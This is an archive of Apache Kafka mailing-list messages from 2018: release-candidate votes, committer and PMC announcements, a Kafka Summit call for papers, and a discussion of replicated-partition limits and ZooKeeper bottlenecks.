> Konstantine Karantasis, lambdaliu, Lincong Li, Lucas Wang, Maciej Bryński,
> Manikumar Reddy,
> Matthias J. Sax, Max Zheng, Michal Dziemianko, Michał Borowiecki,
> radai-rosenblatt, Rajini Sivaram,
> Randall Hauch, Robert Yokota, Simon Clark, Stanislav Kozlovski, Sébastien
> Launay, tedyu,
> Zhanxiang (Patrick) Huang
>
> We welcome your help and feedback. For more information on how to
> report problems, and to get involved, visit the project website at
> https://kafka.apache.org/
>
> Thank you!
>
> Regards,
> Manikumar
>

Re: [kafka-clients] [VOTE] 2.0.1 RC0

2018-11-05 Thread Jun Rao

Hi, Mani,

Thanks for running the release. Verified quickstart on 2.12 binary. +1

Jun

On Thu, Oct 25, 2018 at 7:28 PM, Manikumar 
wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the first candidate for release of Apache Kafka 2.0.1.
>
> This is a bug fix release closing 49 tickets:
> https://cwiki.apache.org/confluence/display/KAFKA/Release+Plan+2.0.1
>
> Release notes for the 2.0.1 release:
> http://home.apache.org/~manikumar/kafka-2.0.1-rc0/RELEASE_NOTES.html
>
> *** Please download, test and vote by  Tuesday, October 30, end of day
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~manikumar/kafka-2.0.1-rc0/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~manikumar/kafka-2.0.1-rc0/javadoc/
>
> * Tag to be voted upon (off 2.0 branch) is the 2.0.1 tag:
> https://github.com/apache/kafka/releases/tag/2.0.1-rc0
>
> * Documentation:
> http://kafka.apache.org/20/documentation.html
>
> * Protocol:
> http://kafka.apache.org/20/protocol.html
>
> * Successful Jenkins builds for the 2.0 branch:
> Unit/integration tests: https://builds.apache.org/job/kafka-2.0-jdk8/177/
>
> /**
>
> Thanks,
> Manikumar
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/CAMVt_AxtMfs6EUqHruCTcq%3DL5A9Wn0YdpXmDbaX-C%2Bvqsrdk%
> 3DQ%40mail.gmail.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

Re: [ANNOUNCE] New Committer: Manikumar Reddy

2018-10-11 Thread Jun Rao

Congratulations, Mani!

Jun

On Thu, Oct 11, 2018 at 10:39 AM, Jason Gustafson 
wrote:

> Hi all,
>
> The PMC for Apache Kafka has invited Manikumar Reddy as a committer and we
> are
> pleased to announce that he has accepted!
>
> Manikumar has contributed 134 commits including significant work to add
> support for delegation tokens in Kafka:
>
> KIP-48:
> https://cwiki.apache.org/confluence/display/KAFKA/KIP-
> 48+Delegation+token+support+for+Kafka
> KIP-249:
> https://cwiki.apache.org/confluence/display/KAFKA/KIP-
> 249%3A+Add+Delegation+Token+Operations+to+KafkaAdminClient
>
> He has broad experience working with many of the core components in Kafka
> and he has reviewed over 80 PRs. He has also made huge progress addressing
> some of our technical debt.
>
> We appreciate the contributions and we are looking forward to more.
> Congrats Manikumar!
>
> Jason, on behalf of the Apache Kafka PMC
>

Re: [kafka-clients] [VOTE] 1.0.2 RC1

2018-07-02 Thread Jun Rao

Hi, Matthias,

Thanks for the running the release. Verified quickstart on scala 2.12
binary. +1

Jun

On Fri, Jun 29, 2018 at 10:02 PM, Matthias J. Sax 
wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the second candidate for release of Apache Kafka 1.0.2.
>
> This is a bug fix release addressing 27 tickets:
> https://cwiki.apache.org/confluence/display/KAFKA/Release+Plan+1.0.2
>
> Release notes for the 1.0.2 release:
> http://home.apache.org/~mjsax/kafka-1.0.2-rc1/RELEASE_NOTES.html
>
> *** Please download, test and vote by end of next week (7/6/18).
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~mjsax/kafka-1.0.2-rc1/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~mjsax/kafka-1.0.2-rc1/javadoc/
>
> * Tag to be voted upon (off 1.0 branch) is the 1.0.2 tag:
> https://github.com/apache/kafka/releases/tag/1.0.2-rc1
>
> * Documentation:
> http://kafka.apache.org/10/documentation.html
>
> * Protocol:
> http://kafka.apache.org/10/protocol.html
>
> * Successful Jenkins builds for the 1.0 branch:
> Unit/integration tests: https://builds.apache.org/job/kafka-1.0-jdk7/214/
> System tests:
> https://jenkins.confluent.io/job/system-test-kafka/job/1.0/225/
>
> /**
>
> Thanks,
>   -Matthias
>
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/ca183ad4-9285-e423-3850-261f9dfec044%40confluent.io.
> For more options, visit https://groups.google.com/d/optout.
>

Re: [kafka-clients] [VOTE] 1.1.1 RC2

2018-06-29 Thread Jun Rao

Hi, Dong,

Thanks for running the release. Verified quickstart on scala 2.12 binary. +1

Jun

On Thu, Jun 28, 2018 at 6:12 PM, Dong Lin  wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the second candidate for release of Apache Kafka 1.1.1.
>
> Apache Kafka 1.1.1 is a bug-fix release for the 1.1 branch that was first
> released with 1.1.0 about 3 months ago. We have fixed about 25 issues since
> that release. A few of the more significant fixes include:
>
> KAFKA-6925  - Fix
> memory leak in StreamsMetricsThreadImpl
> KAFKA-6937  - In-sync
> replica delayed during fetch if replica throttle is exceeded
> KAFKA-6917  - Process
> txn completion asynchronously to avoid deadlock
> KAFKA-6893  - Create
> processors before starting acceptor to avoid ArithmeticException
> KAFKA-6870  -
> Fix ConcurrentModificationException in SampledStat
> KAFKA-6878  - Fix
> NullPointerException when querying global state store
> KAFKA-6879  - Invoke
> session init callbacks outside lock to avoid Controller deadlock
> KAFKA-6857  - Prevent
> follower from truncating to the wrong offset if undefined leader epoch is
> requested
> KAFKA-6854  - Log
> cleaner fails with transaction markers that are deleted during clean
> KAFKA-6747  - Check
> whether there is in-flight transaction before aborting transaction
> KAFKA-6748  - Double
> check before scheduling a new task after the punctuate call
> KAFKA-6739  -
> Fix IllegalArgumentException when down-converting from V2 to V0/V1
> KAFKA-6728  -
> Fix NullPointerException when instantiating the HeaderConverter
>
> Kafka 1.1.1 release plan:
> https://cwiki.apache.org/confluence/display/KAFKA/Release+Plan+1.1.1
>
> Release notes for the 1.1.1 release:
> http://home.apache.org/~lindong/kafka-1.1.1-rc2/RELEASE_NOTES.html
>
> *** Please download, test and vote by Thursday, July 3, 12pm PT ***
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~lindong/kafka-1.1.1-rc2/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~lindong/kafka-1.1.1-rc2/javadoc/
>
> * Tag to be voted upon (off 1.1 branch) is the 1.1.1-rc2 tag:
> https://github.com/apache/kafka/tree/1.1.1-rc2
>
> * Documentation:
> http://kafka.apache.org/11/documentation.html
>
> * Protocol:
> http://kafka.apache.org/11/protocol.html
>
> * Successful Jenkins builds for the 1.1 branch:
> Unit/integration tests: *https://builds.apache.org/job/kafka-1.1-jdk7/157/
> *
> System tests: https://jenkins.confluent.io/job/system-test-kafka-br
> anch-builder/1817
>
>
> Please test and verify the release artifacts and submit a vote for this RC,
> or report any issues so we can fix them and get a new RC out ASAP. Although
> this release vote requires PMC votes to pass, testing, votes, and bug
> reports are valuable and appreciated from everyone.
>
>
> Regards,
> Dong
>
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/CAAaarBb1KsyD_KLuz6V4pfKQiUNQFLb9Lb_eNU%
> 2BsWjd7Vr%2B_%2Bw%40mail.gmail.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

Re: [kafka-clients] [VOTE] 0.11.0.3 RC0

2018-06-29 Thread Jun Rao

Hi, Matthias,

Thanks for running the release. Verified quickstart on scala 2.12 binary. +1

Jun

On Fri, Jun 22, 2018 at 3:14 PM, Matthias J. Sax 
wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the first candidate for release of Apache Kafka 0.11.0.3.
>
> This is a bug fix release closing 27 tickets:
> https://cwiki.apache.org/confluence/display/KAFKA/Release+Plan+0.11.0.3
>
> Release notes for the 0.11.0.3 release:
> http://home.apache.org/~mjsax/kafka-0.11.0.3-rc0/RELEASE_NOTES.html
>
> *** Please download, test and vote by Tuesday, 6/26/18 end-of-day, so we
> can close the vote on Wednesday.
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~mjsax/kafka-0.11.0.3-rc0/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~mjsax/kafka-0.11.0.3-rc0/javadoc/
>
> * Tag to be voted upon (off 0.11.0 branch) is the 0.11.0.3 tag:
> https://github.com/apache/kafka/releases/tag/0.11.0.3-rc0
>
> * Documentation:
> http://kafka.apache.org/0110/documentation.html
>
> * Protocol:
> http://kafka.apache.org/0110/protocol.html
>
> * Successful Jenkins builds for the 0.11.0 branch:
> Unit/integration tests: https://builds.apache.org/job/
> kafka-0.11.0-jdk7/385/
> System tests:
> https://jenkins.confluent.io/job/system-test-kafka/job/0.11.0/217/
>
> /**
>
> Thanks,
>   -Matthias
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/2f54734a-8e8d-3cd7-060b-5f2b3010a20e%40confluent.io.
> For more options, visit https://groups.google.com/d/optout.
>

Re: [kafka-clients] [VOTE] 0.10.2.2 RC1

2018-06-29 Thread Jun Rao

Hi, Matthias,

Thanks for running the release. Verified quickstart on scala 2.12 binary. +1

Jun

On Fri, Jun 22, 2018 at 6:43 PM, Matthias J. Sax 
wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the second candidate for release of Apache Kafka 0.10.2.2.
>
> Note, that RC0 was created before the upgrade to Gradle 4.8.1 and thus,
> we discarded it in favor of RC1 (without sending out a email for RC0).
>
> This is a bug fix release closing 29 tickets:
> https://cwiki.apache.org/confluence/display/KAFKA/Release+Plan+0.10.2.2
>
> Release notes for the 0.10.2.2 release:
> http://home.apache.org/~mjsax/kafka-0.10.2.2-rc1/RELEASE_NOTES.html
>
> *** Please download, test and vote by Tuesday, 6/26/18 end-of-day, so we
> can close the vote on Wednesday.
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~mjsax/kafka-0.10.2.2-rc1/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~mjsax/kafka-0.10.2.2-rc1/javadoc/
>
> * Tag to be voted upon (off 0.10.2 branch) is the 0.10.2.2 tag:
> https://github.com/apache/kafka/releases/tag/0.10.2.2-rc1
>
> * Documentation:
> http://kafka.apache.org/0102/documentation.html
>
> * Protocol:
> http://kafka.apache.org/0102/protocol.html
>
> * Successful Jenkins builds for the 0.10.2 branch:
> Unit/integration tests: https://builds.apache.org/job/
> kafka-0.10.2-jdk7/220/
>
> /**
>
> Thanks,
>   -Matthias
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/8228115e-6913-5c37-06d9-7410a7bd7f69%40confluent.io.
> For more options, visit https://groups.google.com/d/optout.
>

CFP: Kafka Summit San Francisco, 2018

2018-05-08 Thread Jun Rao

Hi, Everyone,

Just want to let you know that Kafka Summit San Francisco, 2018 is open for
submissions. The deadline for submission is Jun. 16. The conference itself
will be held on Oct. 16 - Oct. 17.

More details can be found at
https://kafka-summit.org/kafka-summit-san-francisco-2018/speakers/

Thanks,

Jun

Re: [kafka-clients] Re: [VOTE] 1.1.0 RC4

2018-03-27 Thread Jun Rao

Hi, Rajini,

Thanks for running the release. Verified quickstart on scala 2.11 binary.
+1

Jun


On Tue, Mar 27, 2018 at 6:22 AM, Rajini Sivaram 
wrote:

> Can we get some more votes for this RC so that the release can be rolled
> out soon?
>
> Many thanks,
>
> Rajini
>
> On Sat, Mar 24, 2018 at 6:54 PM, Ted Yu  wrote:
>
>> I wasn't able to reproduce the test failure when it is run alone.
>>
>> This seems to be flaky test.
>>
>> +1 from me.
>>
>> On Sat, Mar 24, 2018 at 11:49 AM, Rajini Sivaram > >
>> wrote:
>>
>> > Hi Ted,
>> >
>> > Thank you for testing the RC. I haven't been able to recreate that
>> failure
>> > after running the test a 100 times. Was it a one-off transient failure
>> or
>> > does it fail consistently for you?
>> >
>> >
>> > On Sat, Mar 24, 2018 at 2:51 AM, Ted Yu  wrote:
>> >
>> > > When I ran test suite, I got one failure:
>> > >
>> > > kafka.api.PlaintextConsumerTest > testAsyncCommit FAILED
>> > > java.lang.AssertionError: expected:<5> but was:<1>
>> > > at org.junit.Assert.fail(Assert.java:88)
>> > > at org.junit.Assert.failNotEquals(Assert.java:834)
>> > > at org.junit.Assert.assertEquals(Assert.java:645)
>> > > at org.junit.Assert.assertEquals(Assert.java:631)
>> > > at
>> > > kafka.api.BaseConsumerTest.awaitCommitCallback(
>> > BaseConsumerTest.scala:214)
>> > > at
>> > > kafka.api.PlaintextConsumerTest.testAsyncCommit(
>> > > PlaintextConsumerTest.scala:513)
>> > >
>> > > Not sure if anyone else saw similar error.
>> > >
>> > > Cheers
>> > >
>> > > On Fri, Mar 23, 2018 at 4:37 PM, Rajini Sivaram <
>> rajinisiva...@gmail.com
>> > >
>> > > wrote:
>> > >
>> > > > Hello Kafka users, developers and client-developers,
>> > > >
>> > > > This is the fifth candidate for release of Apache Kafka 1.1.0.
>> > > >
>> > > > https://cwiki.apache.org/confluence/pages/viewpage.
>> > > action?pageId=75957546
>> > > >
>> > > > A few highlights:
>> > > >
>> > > > * Significant Controller improvements (much faster and session
>> > expiration
>> > > > edge
>> > > > cases fixed)
>> > > > * Data balancing across log directories (JBOD)
>> > > > * More efficient replication when the number of partitions is large
>> > > > * Dynamic Broker Configs
>> > > > * Delegation tokens (KIP-48)
>> > > > * Kafka Streams API improvements (KIP-205 / 210 / 220 / 224 / 239)
>> > > >
>> > > > Release notes for the 1.1.0 release:
>> > > >
>> > > > http://home.apache.org/~rsivaram/kafka-1.1.0-rc4/RELEASE_NOTES.html
>> > > >
>> > > >
>> > > > *** Please download, test and vote by Tuesday March 27th 4pm PT.
>> > > >
>> > > >
>> > > > Kafka's KEYS file containing PGP keys we use to sign the release:
>> > > >
>> > > > http://kafka.apache.org/KEYS
>> > > >
>> > > >
>> > > > * Release artifacts to be voted upon (source and binary):
>> > > >
>> > > > http://home.apache.org/~rsivaram/kafka-1.1.0-rc4/
>> > > >
>> > > >
>> > > > * Maven artifacts to be voted upon:
>> > > >
>> > > > https://repository.apache.org/content/groups/staging/
>> > > >
>> > > >
>> > > > * Javadoc:
>> > > >
>> > > > http://home.apache.org/~rsivaram/kafka-1.1.0-rc4/javadoc/
>> > > >
>> > > >
>> > > > * Tag to be voted upon (off 1.1 branch) is the 1.1.0 tag:
>> > > >
>> > > > https://github.com/apache/kafka/tree/1.1.0-rc4
>> > > >
>> > > >
>> > > >
>> > > > * Documentation:
>> > > >
>> > > > http://kafka.apache.org/11/documentation.html
>> > > >
>> > > >
>> > > > * Protocol:
>> > > >
>> > > > http://kafka.apache.org/11/protocol.html
>> > > >
>> > > >
>> > > >
>> > > > Thanks,
>> > > >
>> > > >
>> > > > Rajini
>> > > >
>> > >
>> >
>>
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/CAOJcB3_6Eyr9knQZ6Sg%2BqyDbAizyqTNcbR%
> 3D7R_%2BA%2BD8c_VWeKg%40mail.gmail.com
> 
> .
>
> For more options, visit https://groups.google.com/d/optout.
>

Re: [kafka-clients] Re: [VOTE] 1.1.0 RC0

2018-03-01 Thread Jun Rao

KAFKA-6111 is now merged to 1.1 branch.

Thanks,

Jun

On Thu, Mar 1, 2018 at 2:50 PM, Jun Rao <j...@confluent.io> wrote:

> Hi, Damian,
>
> It would also be useful to include KAFKA-6111, which prevents
> deleteLogDirEventNotifications path to be deleted correctly from
> Zookeeper. The patch should be committed later today.
>
> Thanks,
>
> Jun
>
> On Thu, Mar 1, 2018 at 1:47 PM, Damian Guy <damian@gmail.com> wrote:
>
>> Thanks Jason. Assuming the system tests pass i'll cut RC1 tomorrow.
>>
>> Thanks,
>> Damian
>>
>> On Thu, 1 Mar 2018 at 19:10 Jason Gustafson <ja...@confluent.io> wrote:
>>
>>> The fix has been merged to 1.1.
>>>
>>> Thanks,
>>> Jason
>>>
>>> On Wed, Feb 28, 2018 at 11:35 AM, Damian Guy <damian@gmail.com>
>>> wrote:
>>>
>>> > Hi Jason,
>>> >
>>> > Ok - thanks. Let me know how you get on.
>>> >
>>> > Cheers,
>>> > Damian
>>> >
>>> > On Wed, 28 Feb 2018 at 19:23 Jason Gustafson <ja...@confluent.io>
>>> wrote:
>>> >
>>> > > Hey Damian,
>>> > >
>>> > > I think we should consider
>>> > > https://issues.apache.org/jira/browse/KAFKA-6593
>>> > > for the release. I have a patch available, but still working on
>>> > validating
>>> > > both the bug and the fix.
>>> > >
>>> > > -Jason
>>> > >
>>> > > On Wed, Feb 28, 2018 at 9:34 AM, Matthias J. Sax <
>>> matth...@confluent.io>
>>> > > wrote:
>>> > >
>>> > > > No. Both will be released.
>>> > > >
>>> > > > -Matthias
>>> > > >
>>> > > > On 2/28/18 6:32 AM, Marina Popova wrote:
>>> > > > > Sorry, maybe a stupid question, but:
>>> > > > >  I see that Kafka 1.0.1 RC2 is still not released, but now 1.1.0
>>> RC0
>>> > is
>>> > > > coming up...
>>> > > > > Does it mean 1.0.1 will be abandoned and we should be looking
>>> forward
>>> > > to
>>> > > > 1.1.0 instead?
>>> > > > >
>>> > > > > thanks!
>>> > > > >
>>> > > > > Sent with ProtonMail Secure Email.
>>> > > > >
>>> > > > > ‐‐‐ Original Message ‐‐‐
>>> > > > >
>>> > > > > On February 26, 2018 6:28 PM, Vahid S Hashemian <
>>> > > > vahidhashem...@us.ibm.com> wrote:
>>> > > > >
>>> > > > >> +1 (non-binding)
>>> > > > >>
>>> > > > >> Built the source and ran quickstart (including streams)
>>> successfully
>>> > > on
>>> > > > >>
>>> > > > >> Ubuntu (with both Java 8 and Java 9).
>>> > > > >>
>>> > > > >> I understand the Windows platform is not officially supported,
>>> but I
>>> > > ran
>>> > > > >>
>>> > > > >> the same on Windows 10, and except for Step 7 (Connect)
>>> everything
>>> > > else
>>> > > > >>
>>> > > > >> worked fine.
>>> > > > >>
>>> > > > >> There are a number of warning and errors (including
>>> > > > >>
>>> > > > >> java.lang.ClassNotFoundException). Here's the final error
>>> message:
>>> > > > >>
>>> > > > >>> bin\\windows\\connect-standalone.bat
>>> config\\connect-standalone.
>>> > > > properties
>>> > > > >>
>>> > > > >> config\\connect-file-source.properties
>>> config\\connect-file-sink.
>>> > > > properties
>>> > > > >>
>>> > > > >> ...
>>> > > > >>
>>> > > > >> \[2018-02-26 14:55:56,529\] ERROR Stopping after connector error
>>> > > > >>
>>> > > > >> (org.apache.kafka.connect.cli.ConnectStandalone)
>>> > > > >>
>>> > > > >> java.lang.NoClassDefFoundError:
>>> > > > >>
>>> > > > >> org

Re: [kafka-clients] Re: [VOTE] 1.1.0 RC0

2018-03-01 Thread Jun Rao

Hi, Damian,

It would also be useful to include KAFKA-6111, which prevents
deleteLogDirEventNotifications
path to be deleted correctly from Zookeeper. The patch should be committed
later today.

Thanks,

Jun

On Thu, Mar 1, 2018 at 1:47 PM, Damian Guy  wrote:

> Thanks Jason. Assuming the system tests pass i'll cut RC1 tomorrow.
>
> Thanks,
> Damian
>
> On Thu, 1 Mar 2018 at 19:10 Jason Gustafson  wrote:
>
>> The fix has been merged to 1.1.
>>
>> Thanks,
>> Jason
>>
>> On Wed, Feb 28, 2018 at 11:35 AM, Damian Guy 
>> wrote:
>>
>> > Hi Jason,
>> >
>> > Ok - thanks. Let me know how you get on.
>> >
>> > Cheers,
>> > Damian
>> >
>> > On Wed, 28 Feb 2018 at 19:23 Jason Gustafson 
>> wrote:
>> >
>> > > Hey Damian,
>> > >
>> > > I think we should consider
>> > > https://issues.apache.org/jira/browse/KAFKA-6593
>> > > for the release. I have a patch available, but still working on
>> > validating
>> > > both the bug and the fix.
>> > >
>> > > -Jason
>> > >
>> > > On Wed, Feb 28, 2018 at 9:34 AM, Matthias J. Sax <
>> matth...@confluent.io>
>> > > wrote:
>> > >
>> > > > No. Both will be released.
>> > > >
>> > > > -Matthias
>> > > >
>> > > > On 2/28/18 6:32 AM, Marina Popova wrote:
>> > > > > Sorry, maybe a stupid question, but:
>> > > > >  I see that Kafka 1.0.1 RC2 is still not released, but now 1.1.0
>> RC0
>> > is
>> > > > coming up...
>> > > > > Does it mean 1.0.1 will be abandoned and we should be looking
>> forward
>> > > to
>> > > > 1.1.0 instead?
>> > > > >
>> > > > > thanks!
>> > > > >
>> > > > > Sent with ProtonMail Secure Email.
>> > > > >
>> > > > > ‐‐‐ Original Message ‐‐‐
>> > > > >
>> > > > > On February 26, 2018 6:28 PM, Vahid S Hashemian <
>> > > > vahidhashem...@us.ibm.com> wrote:
>> > > > >
>> > > > >> +1 (non-binding)
>> > > > >>
>> > > > >> Built the source and ran quickstart (including streams)
>> successfully
>> > > on
>> > > > >>
>> > > > >> Ubuntu (with both Java 8 and Java 9).
>> > > > >>
>> > > > >> I understand the Windows platform is not officially supported,
>> but I
>> > > ran
>> > > > >>
>> > > > >> the same on Windows 10, and except for Step 7 (Connect)
>> everything
>> > > else
>> > > > >>
>> > > > >> worked fine.
>> > > > >>
>> > > > >> There are a number of warning and errors (including
>> > > > >>
>> > > > >> java.lang.ClassNotFoundException). Here's the final error
>> message:
>> > > > >>
>> > > > >>> bin\\windows\\connect-standalone.bat
>> config\\connect-standalone.
>> > > > properties
>> > > > >>
>> > > > >> config\\connect-file-source.properties
>> config\\connect-file-sink.
>> > > > properties
>> > > > >>
>> > > > >> ...
>> > > > >>
>> > > > >> \[2018-02-26 14:55:56,529\] ERROR Stopping after connector error
>> > > > >>
>> > > > >> (org.apache.kafka.connect.cli.ConnectStandalone)
>> > > > >>
>> > > > >> java.lang.NoClassDefFoundError:
>> > > > >>
>> > > > >> org/apache/kafka/connect/transforms/util/RegexValidator
>> > > > >>
>> > > > >> at
>> > > > >>
>> > > > >> org.apache.kafka.connect.runtime.SinkConnectorConfig.<
>> > > > clinit>(SinkConnectorConfig.java:46)
>> > > > >>
>> > > > >> at
>> > > > >>
>> > > > >>
>> > > > >> org.apache.kafka.connect.runtime.AbstractHerder.
>> > > > validateConnectorConfig(AbstractHerder.java:263)
>> > > > >>
>> > > > >> at
>> > > > >>
>> > > > >> org.apache.kafka.connect.runtime.standalone.StandaloneHerder.
>> > > > putConnectorConfig(StandaloneHerder.java:164)
>> > > > >>
>> > > > >> at
>> > > > >>
>> > > > >> org.apache.kafka.connect.cli.ConnectStandalone.main(
>> > > > ConnectStandalone.java:107)
>> > > > >>
>> > > > >> Caused by: java.lang.ClassNotFoundException:
>> > > > >>
>> > > > >> org.apache.kafka.connect.transforms.util.RegexValidator
>> > > > >>
>> > > > >> at
>> > > > >>
>> > > > >> java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(
>> > > > BuiltinClassLoader.java:582)
>> > > > >>
>> > > > >> at
>> > > > >>
>> > > > >> java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.
>> > > > loadClass(ClassLoaders.java:185)
>> > > > >>
>> > > > >> at java.base/java.lang.ClassLoader.loadClass(
>> ClassLoader.java:496)
>> > > > >>
>> > > > >> ... 4 more
>> > > > >>
>> > > > >> Thanks for running the release.
>> > > > >>
>> > > > >> --Vahid
>> > > > >>
>> > > > >> From: Damian Guy damian@gmail.com
>> > > > >>
>> > > > >> To: d...@kafka.apache.org, users@kafka.apache.org,
>> > > > >>
>> > > > >> kafka-clie...@googlegroups.com
>> > > > >>
>> > > > >> Date: 02/24/2018 08:16 AM
>> > > > >>
>> > > > >> Subject: \[VOTE\] 1.1.0 RC0
>> > > > >>
>> > > > >> Hello Kafka users, developers and client-developers,
>> > > > >>
>> > > > >> This is the first candidate for release of Apache Kafka 1.1.0.
>> > > > >>
>> > > > >> This is minor version release of Apache Kakfa. It Includes 29 new
>> > > KIPs.
>> > > > >>
>> > > > >> Please see the release plan for more details:
>> > > > >>
>> > > > >>

Re: [ANNOUNCE] New Kafka PMC Member: Rajini Sivaram

2018-01-18 Thread Jun Rao

Congratulations, Rajini !

Jun

On Wed, Jan 17, 2018 at 10:48 AM, Gwen Shapira  wrote:

> Dear Kafka Developers, Users and Fans,
>
> Rajini Sivaram became a committer in April 2017.  Since then, she remained
> active in the community and contributed major patches, reviews and KIP
> discussions. I am glad to announce that Rajini is now a member of the
> Apache Kafka PMC.
>
> Congratulations, Rajini and looking forward to your future contributions.
>
> Gwen, on behalf of Apache Kafka PMC
>

Re: Kafka Replicated Partition Limits

2018-01-03 Thread Jun Rao

Hi, Andrey,

If the test is in the normal mode, it would be useful to figure out why ZK
is the bottleneck since the normal mode typically doesn't require ZK
accesses.

Thanks,

Jun

On Wed, Jan 3, 2018 at 3:00 PM, Andrey Falko <afa...@salesforce.com> wrote:

> Ben Wood:
> 1. We have 5 ZK nodes.
> 2. I only tracked outstanding requests thus far from ZK-side of
> things. At 9.5k topics, I recorded about 5k outstanding requests. I'll
> start tracking this better for my next run. Anything else worth
> tracking?
>
> Jun Rao:
> I'm testing the latest 1.0.0. I'm testing normal mode. I don't take
> anything down. I had a run where I tried to scale the brokers up, but
> it didn't improve things. Thanks for pointing me at the KIP!
>
> On Wed, Jan 3, 2018 at 2:50 PM, Jun Rao <j...@confluent.io> wrote:
> > Hi, Andrey,
> >
> > Thanks for reporting the results. Which version of Kafka are you testing?
> > Also, it would be useful to know if you are testing the normal mode when
> > all replicas are up and in sync, or the failure mode when some of the
> > replicas are being restarted. Typically, ZK is only accessed in the
> failure
> > mode.
> >
> > We have made some significant improvement in the failure mode by reducing
> > the logging overhead (KAFKA-6116) and making the ZK accesses async
> > (KAFKA-5642). These won't necessarily reduce the number of requests to
> ZK,
> > but will allow better pipelining when accessing ZK.
> >
> > In the normal mode, we are now discussing KIP-227, which could reduce the
> > overhead for replication and consumption when there are many partitions.
> >
> > Jun
> >
> > On Wed, Jan 3, 2018 at 1:48 PM, Andrey Falko <afa...@salesforce.com>
> wrote:
> >
> >> Hi everyone,
> >>
> >> We are seeing more and more push from our Kafka users to support well
> >> more than 10k replicated partitions. We'd ideally like to avoid running
> >> multiple
> >> clusters to keep our cluster management and monitoring simple. We
> started
> >> testing kafka to see how many replicated partitions it could handle.
> >>
> >> We found that, to maintain SLAs of under 50ms for produce latency,
> >> Kafka starts going downhill at around 9k topics with 5 brokers. Each
> topic
> >> is
> >> replicated 3x in our test. The bottleneck appears to be zookeeper:
> >> after a certain
> >> period of time, the number of outstanding requests in ZK spikes up at a
> >> linear rate. Slowing down the rate at which we create and produce to
> >> topics,
> >> improves things, but doing that makes the system tougher to manage and
> use.
> >> We are happy to publish our detailed results with reproduction
> >> steps if anyone is interested.
> >>
> >> Has anyone overcome this problem and scaled beyond 9k replicated
> >> partitions?
> >> Does anyone have zookeeper tuning suggestions? Is it even the
> bottleneck?
> >>
> >> According to this we should have at most 300 3x replicated per broker:
> >> https://www.confluent.io/blog/how-to-choose-the-number-of-
> >> topicspartitions-in-a-kafka-cluster/
> >> Is anyone doing work to have kafka support more than that?
> >>
> >> Best regards,
> >> Andrey Falko
> >> Salesforce.com
> >>
>

Re: Kafka Replicated Partition Limits

2018-01-03 Thread Jun Rao

Hi, Andrey,

Thanks for reporting the results. Which version of Kafka are you testing?
Also, it would be useful to know if you are testing the normal mode when
all replicas are up and in sync, or the failure mode when some of the
replicas are being restarted. Typically, ZK is only accessed in the failure
mode.

We have made some significant improvement in the failure mode by reducing
